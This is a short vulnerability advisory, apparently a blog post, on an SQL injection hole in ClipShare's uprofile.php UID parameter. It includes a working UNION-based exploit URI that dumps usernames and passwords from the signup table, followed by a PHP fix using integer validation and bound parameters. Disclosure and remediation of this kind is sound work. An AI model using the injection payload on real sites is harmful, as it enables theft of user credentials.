This security issue was primarily reported by Krit. and Pr0metheuS. ClipShare, a leading PHP video sharing script, has an SQL injection vulnerability in its user profile page (uprofile.php). The application does not properly sanitize the user-supplied UID value before using it in an SQL query. Attackers can use this flaw to access or alter the user database.

Example URI:

http://www.example.com/uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20/*

ClipShare has not issued a patch for this issue. If you have an idea for a fix, or a patch, please share it here so others can benefit from your contribution.
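One way to close this class of hole, shown as an added example that is not ClipShare's code or an official patch: accept UID only when it is a positive integer, and pass it to the database as a bound parameter. The table and column names come from the URI above; the function names, the query shape, and the use of PDO with an in-memory SQLite database are assumptions made so the example runs on its own.

```php
<?php
// Added example, not ClipShare code. Table and column names (signup, uid,
// username, pwd) are taken from the URI above; everything else is assumed.

// Accept UID only if it is a plain positive decimal integer.
function parse_uid($raw): ?int
{
    if (!is_string($raw)) {          // rejects array input such as UID[]=1
        return null;
    }
    $uid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $uid === false ? null : $uid;
}

// Look up a profile with a bound parameter, so the value is never parsed as SQL.
// The query names only the columns the page displays and leaves pwd out.
function fetch_profile(PDO $db, int $uid): ?array
{
    $stmt = $db->prepare('SELECT uid, username FROM signup WHERE uid = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed data: an in-memory SQLite table stands in for the site's database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE signup (uid INTEGER PRIMARY KEY, username TEXT, pwd TEXT)');
$db->exec("INSERT INTO signup VALUES (1, 'alice', 'constructed-hash')");

// Constructed inputs: a valid ID, the decoded start of the URI above, an unknown ID.
$samples = ['1', '1 and 1=2 union select 1,2,3', '999'];
foreach ($samples as $raw) {
    $uid = parse_uid($raw);
    if ($uid === null) {
        // In a real page: send HTTP 400 and stop before any query is built.
        echo 'rejected: ', var_export($raw, true), "\n";
        continue;
    }
    $profile = fetch_profile($db, $uid);
    echo $profile === null ? "no such user: $uid\n" : "profile: {$profile['username']}\n";
}
```

Either measure alone blocks the URI above; using both keeps the query safe even if the validation is later loosened or the parameter is reused elsewhere.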

Written by Hemant Patel

Hemant, hailing from Bhopal, Madhya Pradesh, India, is a web developer and occasional blogger passionate about exchanging ideas and addressing problems in his coding journey.